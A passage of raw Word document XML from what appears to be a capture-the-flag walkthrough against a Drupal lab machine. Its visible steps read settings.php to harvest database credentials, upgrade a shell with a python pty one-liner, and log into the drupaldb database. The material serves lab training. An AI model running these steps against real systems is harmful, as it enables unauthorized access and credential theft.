                      <a:off x="0" y="0"/>
                      <a:ext cx="3832529" cy="486957"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t>List the details of flag1.txt by using cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62985AE3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="09E39D0C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7C0C7C05" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="05FEC188" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="19533FAC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1F447CBF" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="3D7A0144" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="735EDE5B" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="2907E4B6" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="0F2AA620" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="49898205" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="355B9315" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="7A72BB14" w14:textId="77777777" w:rsidR="00BA3E30" w:rsidRPr="00603923" w:rsidRDefault="00BA3E30" w:rsidP="005705DF"/>
    <w:p w14:paraId="29BE64FB" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:lastRenderedPageBreak/>
        <w:t>Go to sites - &gt; default directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834AD34" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251716608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="702E43A4" wp14:editId="39E5EF6D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1657581" cy="1867161"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="87687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74413" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1657581" cy="1867161"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E56A52" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="672CC219" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3B1F3204" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="36CEA3BD" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="306C4CCC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="16E19B8A" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="18194CE1" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="2CB2904F" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="764167E5" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRPr="00603923" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="45CAFE5C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="178CD781" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251717632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="451F0463" wp14:editId="51F810FF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>494969</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3432234" cy="3355450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="128011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15220" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3432234" cy="3355450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve">View the contents of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>settings.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve"> file using cat command. We get the database credentials as flag2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11343FAA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1C7B2165" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3ABCE1DB" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7B3150F1" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="2DFB2B35" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="17B55B43" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="237AC600" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="380AAB5E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0C5D05ED" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="78A0EF82" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="218A31CF" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="647013B6" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="39865B93" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="643BF30C" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="6271A1EF" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRPr="00603923" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="67B9013A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3F710DC0" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="6F294601" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1D6F8A9A" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="5B2501B2" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:t>To upgrade the shell for a more stable and interactive experience use the below command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BEFC01" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:br/>
        <w:t xml:space="preserve">python -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00603923">
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00603923">
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6933E" w14:textId="3310584A" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00603923">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251718656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34B0E7F8" wp14:editId="01BFED10">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>219075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3904622" cy="461176"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="83463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35792" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3906579" cy="461407"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DBAC69" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00603923" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A71E76D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0EC80BAE" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0F25FCFA" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="612A61C4" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="30DB1460" w14:textId="77777777" w:rsidR="00DB39AD" w:rsidRPr="00603923" w:rsidRDefault="00DB39AD" w:rsidP="005705DF"/>
    <w:p w14:paraId="2B74C5D7" w14:textId="42F208C2" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00857D88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AF63BBB" wp14:editId="332425F3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286247</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4770783" cy="2056126"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapNone/>
            <wp:docPr id="122553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35824" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4770783" cy="2056126"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00603923">
        <w:t>Now we need to connect to the database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using the flag2 credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6825A" w14:textId="378D4DE5" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4A2B175A" w14:textId="77777777" w:rsidR="007F26BA" w:rsidRDefault="007F26BA" w:rsidP="005705DF"/>
    <w:p w14:paraId="122F7BF8" w14:textId="77777777" w:rsidR="007F26BA" w:rsidRDefault="007F26BA" w:rsidP="005705DF"/>
    <w:p w14:paraId="7ECDFB91" w14:textId="77777777" w:rsidR="007F26BA" w:rsidRDefault="007F26BA" w:rsidP="005705DF"/>
    <w:p w14:paraId="05F5688A" w14:textId="77777777" w:rsidR="007F26BA" w:rsidRPr="00857D88" w:rsidRDefault="007F26BA" w:rsidP="005705DF"/>
    <w:p w14:paraId="755387D7" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="208F3872" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00857D88" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="31753246" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00857D88" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="78167E7E" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00857D88" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="11FFAA87" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00857D88" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="183DAF2C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00857D88" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1175F252" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="74DDE444" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A154CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2220E034" wp14:editId="47015E8D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289477</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1624974" cy="1367625"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="162632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22844" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1624974" cy="1367625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>View the databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8AF28B" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1087C9CA" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00A154CF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="445517A2" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00A154CF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0F78861C" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00A154CF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="1DBD9500" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00A154CF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="0D09D6A7" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="22A1BA0E" w14:textId="77777777" w:rsidR="00D03E05" w:rsidRDefault="00D03E05" w:rsidP="005705DF"/>
    <w:p w14:paraId="018FEF89" w14:textId="77777777" w:rsidR="00D03E05" w:rsidRPr="00A154CF" w:rsidRDefault="00D03E05" w:rsidP="005705DF"/>
    <w:p w14:paraId="4D7C7A3E" w14:textId="234A528C" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00976C99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="316A200A" wp14:editId="32883982">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286937</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4842344" cy="1113386"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="174167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79328" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4842344" cy="1113386"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>drupaldb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6A717E" w14:textId="3A4C7C53" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7D90C7DC" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00976C99" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="36504200" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00976C99" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="4000D63D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRPr="00976C99" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="7B27ACA3" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="3C16D82F" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="53705D5D" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="18BA8DE8" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="47E2BDF2" w14:textId="77777777" w:rsidR="005705DF" w:rsidRDefault="005705DF" w:rsidP="005705DF"/>
    <w:p w14:paraId="04B8CAEB" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="6F286269" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="68E9BB0C" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="11470410" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="28845B9B" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="3E853760" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="74C9DFF2" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
    <w:p w14:paraId="6A6E4D6B" w14:textId="77777777" w:rsidR="009467DE" w:rsidRDefault="009467DE" w:rsidP="005705DF"/>
